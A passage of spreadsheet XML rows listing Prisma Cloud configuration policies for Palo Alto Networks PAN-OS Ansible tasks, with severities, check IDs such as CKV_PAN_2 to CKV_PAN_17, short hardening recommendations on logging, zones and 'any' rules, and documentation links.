      <c r="N1427" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1427" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1427" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1427" t="inlineStr"/>
      <c r="R1427" t="inlineStr"/>
      <c r="S1427" t="inlineStr"/>
      <c r="T1427" t="b">
        <v>0</v>
      </c>
      <c r="U1427" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1427" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-management-profile</t>
        </is>
      </c>
      <c r="W1427" t="inlineStr">
        <is>
          <t>Ensure plain-text management HTTP is not enabled for an Interface Management Profile</t>
        </is>
      </c>
      <c r="X1427" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-2</t>
        </is>
      </c>
      <c r="Y1427" t="inlineStr"/>
      <c r="Z1427" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_management_profile"]}</t>
        </is>
      </c>
      <c r="AA1427" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1427" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1427" t="inlineStr">
        <is>
          <t>CKV_PAN_2</t>
        </is>
      </c>
      <c r="AD1427" t="b">
        <v>1</v>
      </c>
      <c r="AE1427" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1427" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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7" t="inlineStr">
        <is>
          <t>848bb701-1ca5-464a-b64d-112fa57a6c30</t>
        </is>
      </c>
      <c r="AI1427" t="inlineStr"/>
      <c r="AJ1427" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1427" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1428">
      <c r="A1428" t="inlineStr"/>
      <c r="B1428" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1428" s="2" t="inlineStr"/>
      <c r="D1428" t="inlineStr"/>
      <c r="E1428" t="inlineStr"/>
      <c r="F1428" t="inlineStr"/>
      <c r="G1428" t="b">
        <v>1</v>
      </c>
      <c r="H14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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1428" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security</t>
        </is>
      </c>
      <c r="K1428" t="inlineStr">
        <is>
          <t>Security rules apply to all zones on Palo Alto Networks devices</t>
        </is>
      </c>
      <c r="L1428" t="inlineStr"/>
      <c r="M1428" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1428" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1428" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1428" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1428" t="inlineStr"/>
      <c r="R1428" t="inlineStr"/>
      <c r="S1428" t="inlineStr"/>
      <c r="T1428" t="b">
        <v>0</v>
      </c>
      <c r="U1428" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1428" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security-rule</t>
        </is>
      </c>
      <c r="W1428" t="inlineStr">
        <is>
          <t>Ensure security rules do not have source_zone and destination_zone both containing values of any</t>
        </is>
      </c>
      <c r="X1428" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-17</t>
        </is>
      </c>
      <c r="Y1428" t="inlineStr"/>
      <c r="Z1428" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_security_rule"]}</t>
        </is>
      </c>
      <c r="AA1428" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1428" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1428" t="inlineStr">
        <is>
          <t>CKV_PAN_17</t>
        </is>
      </c>
      <c r="AD1428" t="b">
        <v>1</v>
      </c>
      <c r="AE1428" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1428" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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8" t="inlineStr">
        <is>
          <t>82c67311-2725-4c38-8407-09096b6631f6</t>
        </is>
      </c>
      <c r="AI1428" t="inlineStr"/>
      <c r="AJ1428" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1428" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1429">
      <c r="A1429" t="inlineStr"/>
      <c r="B1429" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1429" s="2" t="inlineStr"/>
      <c r="D1429" t="inlineStr"/>
      <c r="E1429" t="inlineStr"/>
      <c r="F1429" t="inlineStr"/>
      <c r="G1429" t="b">
        <v>1</v>
      </c>
      <c r="H14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29" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1429" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security</t>
        </is>
      </c>
      <c r="K1429" t="inlineStr">
        <is>
          <t>Security policies missing descriptions in Palo Alto Networks devices</t>
        </is>
      </c>
      <c r="L1429" t="inlineStr"/>
      <c r="M1429" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1429" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1429" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1429" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1429" t="inlineStr"/>
      <c r="R1429" t="inlineStr"/>
      <c r="S1429" t="inlineStr"/>
      <c r="T1429" t="b">
        <v>0</v>
      </c>
      <c r="U1429" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1429" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security-rule</t>
        </is>
      </c>
      <c r="W1429" t="inlineStr">
        <is>
          <t>Ensure description is populated within security policies</t>
        </is>
      </c>
      <c r="X1429" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-8</t>
        </is>
      </c>
      <c r="Y1429" t="inlineStr"/>
      <c r="Z1429" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_security_rule"]}</t>
        </is>
      </c>
      <c r="AA1429" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1429" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1429" t="inlineStr">
        <is>
          <t>CKV_PAN_8</t>
        </is>
      </c>
      <c r="AD1429" t="b">
        <v>1</v>
      </c>
      <c r="AE1429" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1429" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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29" t="inlineStr">
        <is>
          <t>98a1b30a-faed-4dd0-9d02-a4c48ddd6b70</t>
        </is>
      </c>
      <c r="AI1429" t="inlineStr"/>
      <c r="AJ1429" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1429" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1430">
      <c r="A1430" t="inlineStr"/>
      <c r="B1430" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1430" s="2" t="inlineStr"/>
      <c r="D1430" t="inlineStr"/>
      <c r="E1430" t="inlineStr"/>
      <c r="F1430" t="inlineStr"/>
      <c r="G1430" t="b">
        <v>1</v>
      </c>
      <c r="H14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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1430" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security</t>
        </is>
      </c>
      <c r="K1430" t="inlineStr">
        <is>
          <t>Logging at session start enabled on Palo Alto Networks devices</t>
        </is>
      </c>
      <c r="L1430" t="inlineStr"/>
      <c r="M1430" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1430" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1430" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1430" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1430" t="inlineStr"/>
      <c r="R1430" t="inlineStr"/>
      <c r="S1430" t="inlineStr"/>
      <c r="T1430" t="b">
        <v>0</v>
      </c>
      <c r="U1430" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1430" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security-rule</t>
        </is>
      </c>
      <c r="W1430" t="inlineStr">
        <is>
          <t>Ensure logging at session start is disabled within security policies except for troubleshooting and long lived GRE tunnels</t>
        </is>
      </c>
      <c r="X1430" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-16</t>
        </is>
      </c>
      <c r="Y1430" t="inlineStr"/>
      <c r="Z1430" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_security_rule"]}</t>
        </is>
      </c>
      <c r="AA1430" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1430" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1430" t="inlineStr">
        <is>
          <t>CKV_PAN_16</t>
        </is>
      </c>
      <c r="AD1430" t="b">
        <v>1</v>
      </c>
      <c r="AE1430" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1430" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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0" t="inlineStr">
        <is>
          <t>1af4aab2-8250-4552-9792-90a641bd666b</t>
        </is>
      </c>
      <c r="AI1430" t="inlineStr"/>
      <c r="AJ1430" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1430" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1431">
      <c r="A1431" t="inlineStr"/>
      <c r="B1431" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1431" s="2" t="inlineStr"/>
      <c r="D1431" t="inlineStr"/>
      <c r="E1431" t="inlineStr"/>
      <c r="F1431" t="inlineStr"/>
      <c r="G1431" t="b">
        <v>1</v>
      </c>
      <c r="H14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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1431" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security</t>
        </is>
      </c>
      <c r="K1431" t="inlineStr">
        <is>
          <t>Log Forwarding Profile not selected for a Palo Alto Networks device security policy rule</t>
        </is>
      </c>
      <c r="L1431" t="inlineStr"/>
      <c r="M1431" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1431" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1431" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1431" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1431" t="inlineStr"/>
      <c r="R1431" t="inlineStr"/>
      <c r="S1431" t="inlineStr"/>
      <c r="T1431" t="b">
        <v>0</v>
      </c>
      <c r="U1431" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1431" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security-rule</t>
        </is>
      </c>
      <c r="W1431" t="inlineStr">
        <is>
          <t>Ensure a Log Forwarding Profile is selected for each security policy rule</t>
        </is>
      </c>
      <c r="X1431" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-9</t>
        </is>
      </c>
      <c r="Y1431" t="inlineStr"/>
      <c r="Z1431" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_security_rule"]}</t>
        </is>
      </c>
      <c r="AA1431" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1431" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1431" t="inlineStr">
        <is>
          <t>CKV_PAN_9</t>
        </is>
      </c>
      <c r="AD1431" t="b">
        <v>1</v>
      </c>
      <c r="AE1431" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1431" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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1" t="inlineStr">
        <is>
          <t>7d87f63b-abca-47c8-8e18-0365f4bb4a23</t>
        </is>
      </c>
      <c r="AI1431" t="inlineStr"/>
      <c r="AJ1431" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1431" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1432">
      <c r="A1432" t="inlineStr"/>
      <c r="B1432" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1432" s="2" t="inlineStr"/>
      <c r="D1432" t="inlineStr"/>
      <c r="E1432" t="inlineStr"/>
      <c r="F1432" t="inlineStr"/>
      <c r="G1432" t="b">
        <v>1</v>
      </c>
      <c r="H14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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1432" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security</t>
        </is>
      </c>
      <c r="K1432" t="inlineStr">
        <is>
          <t>Security Rule in Palo Alto Networks devices with overly broad Source and Destination IPs</t>
        </is>
      </c>
      <c r="L1432" t="inlineStr"/>
      <c r="M1432" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1432" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1432" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1432" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1432" t="inlineStr"/>
      <c r="R1432" t="inlineStr"/>
      <c r="S1432" t="inlineStr"/>
      <c r="T1432" t="b">
        <v>0</v>
      </c>
      <c r="U1432" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1432" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security-rule</t>
        </is>
      </c>
      <c r="W1432" t="inlineStr">
        <is>
          <t>Ensure security rules do not have source_ip and destination_ip both containing values of any</t>
        </is>
      </c>
      <c r="X1432" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-7</t>
        </is>
      </c>
      <c r="Y1432" t="inlineStr"/>
      <c r="Z1432" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_security_rule"]}</t>
        </is>
      </c>
      <c r="AA1432" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1432" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1432" t="inlineStr">
        <is>
          <t>CKV_PAN_7</t>
        </is>
      </c>
      <c r="AD1432" t="b">
        <v>1</v>
      </c>
      <c r="AE1432" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1432" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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2" t="inlineStr">
        <is>
          <t>d97830b0-81dd-4daf-9a16-7ab829223466</t>
        </is>
      </c>
      <c r="AI1432" t="inlineStr"/>
      <c r="AJ1432" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1432" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1433">
      <c r="A1433" t="inlineStr"/>
      <c r="B1433" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1433" s="2" t="inlineStr"/>
      <c r="D1433" t="inlineStr"/>
      <c r="E1433" t="inlineStr"/>
      <c r="F1433" t="inlineStr"/>
      <c r="G1433" t="b">
        <v>1</v>
      </c>
      <c r="H14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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1433" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security</t>
        </is>
      </c>
      <c r="K1433" t="inlineStr">
        <is>
          <t>Security rule allows any application on Palo Alto Networks devices</t>
        </is>
      </c>
      <c r="L1433" t="inlineStr"/>
      <c r="M1433" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1433" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1433" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1433" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1433" t="inlineStr"/>
      <c r="R1433" t="inlineStr"/>
      <c r="S1433" t="inlineStr"/>
      <c r="T1433" t="b">
        <v>0</v>
      </c>
      <c r="U1433" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1433" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security-rule</t>
        </is>
      </c>
      <c r="W1433" t="inlineStr">
        <is>
          <t>Ensure security rules do not have application set to any</t>
        </is>
      </c>
      <c r="X1433" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-5</t>
        </is>
      </c>
      <c r="Y1433" t="inlineStr"/>
      <c r="Z1433" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_security_rule"]}</t>
        </is>
      </c>
      <c r="AA1433" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1433" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1433" t="inlineStr">
        <is>
          <t>CKV_PAN_5</t>
        </is>
      </c>
      <c r="AD1433" t="b">
        <v>1</v>
      </c>
      <c r="AE1433" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1433" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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3" t="inlineStr">
        <is>
          <t>53a8dd07-78ad-4d7e-a714-fcf1f0dffc81</t>
        </is>
      </c>
      <c r="AI1433" t="inlineStr"/>
      <c r="AJ1433" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1433" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1434">
      <c r="A1434" t="inlineStr"/>
      <c r="B1434" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1434" s="2" t="inlineStr"/>
      <c r="D1434" t="inlineStr"/>
      <c r="E1434" t="inlineStr"/>
      <c r="F1434" t="inlineStr"/>
      <c r="G1434" t="b">
        <v>1</v>
      </c>
      <c r="H14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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1434" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security</t>
        </is>
      </c>
      <c r="K1434" t="inlineStr">
        <is>
          <t>Disable Server Response Inspection (DSRI) enabled in security policies for Palo Alto Networks devices</t>
        </is>
      </c>
      <c r="L1434" t="inlineStr"/>
      <c r="M1434" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1434" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1434" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1434" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1434" t="inlineStr"/>
      <c r="R1434" t="inlineStr"/>
      <c r="S1434" t="inlineStr"/>
      <c r="T1434" t="b">
        <v>0</v>
      </c>
      <c r="U1434" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1434" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security-rule</t>
        </is>
      </c>
      <c r="W1434" t="inlineStr">
        <is>
          <t>Ensure DSRI is not enabled within security policies</t>
        </is>
      </c>
      <c r="X1434" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-4</t>
        </is>
      </c>
      <c r="Y1434" t="inlineStr"/>
      <c r="Z1434" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_security_rule"]}</t>
        </is>
      </c>
      <c r="AA1434" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1434" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1434" t="inlineStr">
        <is>
          <t>CKV_PAN_4</t>
        </is>
      </c>
      <c r="AD1434" t="b">
        <v>1</v>
      </c>
      <c r="AE1434" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1434" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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4" t="inlineStr">
        <is>
          <t>42d4b94e-2741-4366-889a-58e8c3cde1cb</t>
        </is>
      </c>
      <c r="AI1434" t="inlineStr"/>
      <c r="AJ1434" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1434" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1435">
      <c r="A1435" t="inlineStr"/>
      <c r="B1435" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1435" s="2" t="inlineStr"/>
      <c r="D1435" t="inlineStr"/>
      <c r="E1435" t="inlineStr"/>
      <c r="F1435" t="inlineStr"/>
      <c r="G1435" t="b">
        <v>1</v>
      </c>
      <c r="H14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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1435" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security</t>
        </is>
      </c>
      <c r="K1435" t="inlineStr">
        <is>
          <t>End-of-session logging disabled on Palo Alto Networks security policies</t>
        </is>
      </c>
      <c r="L1435" t="inlineStr"/>
      <c r="M1435" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1435" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1435" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1435" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1435" t="inlineStr"/>
      <c r="R1435" t="inlineStr"/>
      <c r="S1435" t="inlineStr"/>
      <c r="T1435" t="b">
        <v>0</v>
      </c>
      <c r="U1435" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1435" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security-rule</t>
        </is>
      </c>
      <c r="W1435" t="inlineStr">
        <is>
          <t>Ensure logging at session end is enabled within security policies</t>
        </is>
      </c>
      <c r="X1435" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-10</t>
        </is>
      </c>
      <c r="Y1435" t="inlineStr"/>
      <c r="Z1435" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_security_rule"]}</t>
        </is>
      </c>
      <c r="AA1435" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1435" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1435" t="inlineStr">
        <is>
          <t>CKV_PAN_10</t>
        </is>
      </c>
      <c r="AD1435" t="b">
        <v>1</v>
      </c>
      <c r="AE1435" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1435" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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5" t="inlineStr">
        <is>
          <t>d7b88f49-8ff1-4291-8c12-f4d5b1a0cb44</t>
        </is>
      </c>
      <c r="AI1435" t="inlineStr"/>
      <c r="AJ1435" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1435" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1436">
      <c r="A1436" t="inlineStr"/>
      <c r="B1436" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1436" s="2" t="inlineStr"/>
      <c r="D1436" t="inlineStr"/>
      <c r="E1436" t="inlineStr"/>
      <c r="F1436" t="inlineStr"/>
      <c r="G1436" t="b">
        <v>1</v>
      </c>
      <c r="H14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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1436" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security</t>
        </is>
      </c>
      <c r="K1436" t="inlineStr">
        <is>
          <t>Security rule permits any service on Palo Alto Networks devices</t>
        </is>
      </c>
      <c r="L1436" t="inlineStr"/>
      <c r="M1436" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1436" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1436" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1436" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1436" t="inlineStr"/>
      <c r="R1436" t="inlineStr"/>
      <c r="S1436" t="inlineStr"/>
      <c r="T1436" t="b">
        <v>0</v>
      </c>
      <c r="U1436" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1436" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-security-rule</t>
        </is>
      </c>
      <c r="W1436" t="inlineStr">
        <is>
          <t>Ensure security rules do not have service set to any</t>
        </is>
      </c>
      <c r="X1436" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-6</t>
        </is>
      </c>
      <c r="Y1436" t="inlineStr"/>
      <c r="Z1436" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_security_rule"]}</t>
        </is>
      </c>
      <c r="AA1436" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1436" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1436" t="inlineStr">
        <is>
          <t>CKV_PAN_6</t>
        </is>
      </c>
      <c r="AD1436" t="b">
        <v>1</v>
      </c>
      <c r="AE1436" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1436" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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6" t="inlineStr">
        <is>
          <t>49835975-c362-4b56-84e0-38abd502a1bb</t>
        </is>
      </c>
      <c r="AI1436" t="inlineStr"/>
      <c r="AJ1436" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1436" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1437">
      <c r="A1437" t="inlineStr"/>
      <c r="B1437" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1437" s="2" t="inlineStr"/>
      <c r="D1437" t="inlineStr"/>
      <c r="E1437" t="inlineStr"/>
      <c r="F1437" t="inlineStr"/>
      <c r="G1437" t="b">
        <v>1</v>
      </c>
      <c r="H14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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1437" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-zone</t>
